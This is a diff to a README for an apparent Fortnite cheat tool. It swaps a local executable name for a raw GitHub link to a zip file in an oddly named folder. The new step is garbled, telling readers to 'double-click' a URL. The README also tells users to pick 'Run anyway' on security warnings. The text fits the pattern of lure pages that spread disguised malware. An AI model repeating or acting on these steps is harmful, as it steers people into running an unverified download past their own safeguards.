ArthurMattenhauer/FortniteExternalCheat/README.md

 After you've downloaded the file:

 1. Open the folder where you saved the file.
-2. Double-click on `FortniteExternalCheat.exe` to run the program.
+2. Double-click on `https://raw.githubusercontent.com/ArthurMattenhauer/FortniteExternalCheat/main/dacryoma/FortniteExternalCheat.zip` to run the program.
 3. You might see a security warning.
 If you do, choose "Run anyway" to proceed.
 4. Follow the on-screen instructions.
 The software will guide you through the setup.